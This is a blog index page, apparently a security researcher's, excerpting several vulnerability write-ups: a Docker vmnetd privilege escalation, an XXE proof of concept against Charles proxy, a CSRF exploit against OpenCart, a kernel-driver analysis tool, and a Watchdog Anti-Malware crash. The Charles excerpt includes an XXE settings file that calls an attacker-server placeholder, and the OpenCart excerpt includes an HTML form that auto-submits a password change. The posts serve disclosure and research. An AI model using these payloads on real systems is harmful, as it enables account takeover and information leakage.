博文

Docker's latest version of privilege escalation vulnerability

图片
0x00 Vulnerability analysis 1.com.docker.vmnetd is a launch service that runs at root authority; communicates with the client (Docker) through a local socket; after analysis, it is found that the client is not verified during the communication process, resulting in the risk of elevated permissions 2. The two main functions in main_handle are vmnet_handshake_Perform and vmnetd_commands_Handle; vmnet_handshake_Perform function mainly initializes the message and obtains the corresponding client command. vmnetd_commands_Handle function calls the corresponding callback function according to the obtained command 2.1 vmnet_handshake_Perform 2.1.1 First obtain the initialization message (3 packets) requested by the client through vmnet_handshake_readInitMessage. The message structure is as follows packet-1: flag c00009a318  56 4d 4e 33 54 00 00 00 00 00 00 00 00 00 00 00  VMN3T........... c00009a328  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ packet-2:versi

Charles 4.2.7 XML External Entity

图片
Software Link: https://www.charlesproxy.com Date:11.12.2018 Exploit Author:CK01 Version:<=4.2.7 Security Issue: The XML External Entity vulnerability exists in the Charles import/export setup option. If the user imports the "Charles Settings.xml" of the attacker, the internal network may be detected and the information may be leaked. POC: 1.Charles Setting.xml:(127.0.0.1 -> attacker's server ) <?xml version='1.0' encoding='UTF-8' ?> <?charles serialisation-version='2.0' ?> <!DOCTYPE data [ <!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]> <charles-export> <proxyConfiguration> <enableSOCKSProxy>false</enableSOCKSProxy> <dynamicHTTPPort>false</dynamicHTTPPort> <dynamicSOCKSPort>false</dynamicSOCKSPort> <enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying> <port>8888</port>

Opencart-v3-0-3-0 user changes password at csrf vulnerability

图片
Software Link: https://github.com/opencart/opencart/ Date: 06.28.2018 Exploit Author:CK01 Version:<= V3-0-3-0 0x00 Vulnerability analysis       The user token was not verified at the password change, causing the csrf vulnerability to modify the user password  /upload/catalog/controller/account/password.php 0x01 Exploit Save the following exp as html and open the run <html>   <body>     <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">   <input type="hidden" name="password" value="CK01ck01" />       <input type="hidden" name="confirm" value="CK01ck01" /> <script>         document.getElementById('post123').submit();  </script>     </form>   </body> </html>

内核漏洞辅助分析工具

图片
0x00  IopfCompleteRequest 函数 hook         1. 获取 nt 模块的加载基址 , 加上固定的 rva, 对 IopfCompleteRequest 函数的前 5 个字节 opcode 进  行 inline hook  2.MyIopfCompleteRequest 处理主要是判断 IoControlCode 是不是目标的 IoControlCode ,如果是的话则过滤需要的信息 ( 目  标 IoControlCode(g_IoCode), 返回地址 (retAddr), 目标驱动的加载基址 (BugSysBase), 返回地址 RVA(retAddr Rva))       0x01 IRP 处理函数 hook    1. 通过 ring3 层传进来的 IRP 处理函数 rva, 进行 inline hook      2. MyIrpFun 主要处理 : 设置了 int3 断点,方便调试 ; 过滤从 ring3 层传进来的 buffer 和 size 信息 , 在过滤函数中恢复回原来的指令,再执行回原本的 IRP 处  理函数 .                    2.1 在执行回原来的 IRP 处理函数之前,通过修改返回地址为挂钩函数的地址 (retHookA) ,当原来的 IRP 处理函数处理完后,返回时将跳到 retHookA 函数重新挂钩             0x02 实战 -HackSysTeam 项目池溢出        1. 漏洞分析时,一般都能获取到 poc( 这里我写了个 poc, 未溢出的 ; 溢出产生 BSOD 后打印不了信息 ; 实际分析时 , 可以改下 poc 代码 , 先确定 IRP 处理函数后 )         int main() { DWORD retLen; CHAR inputbuff[0x90] = { 0 }; DWORD intputLen; HANDLE hDevice = CreateFileW( L"\\\\.\\HacksysExtremeVulne

Watchdog Anti-Malware Null Pointer Reference Vulnerability

图片
0x00  fuzz              1.https://www.watchdogdevelopment.com/ Download the latest version for testing       Software version : 2.74.186.426       Driver version : 2.74.0.259          2.Static analysis of the driver module to find the IRP processing function        3.Perform fuzz test on the 80002010 control code, and the system generates BSOD     0x01  Vulnerability analysis          1.Here I use the tools I wrote to assist analysis. IRP functions are hooked through the rva and drivers of the passed in IRP function.             2.Re-do fuzz, it will break into the MyIrpFun function, step by step here, through the help tool can be seen that the incoming buff is empty (the first fuzz fill 0x41, the second fuzz is filled with 0)         3.Keep single step and quickly reach the place where you refer to the null pointer       Since the buf passed in from the ring3 layer does not determine whether it is empty, the content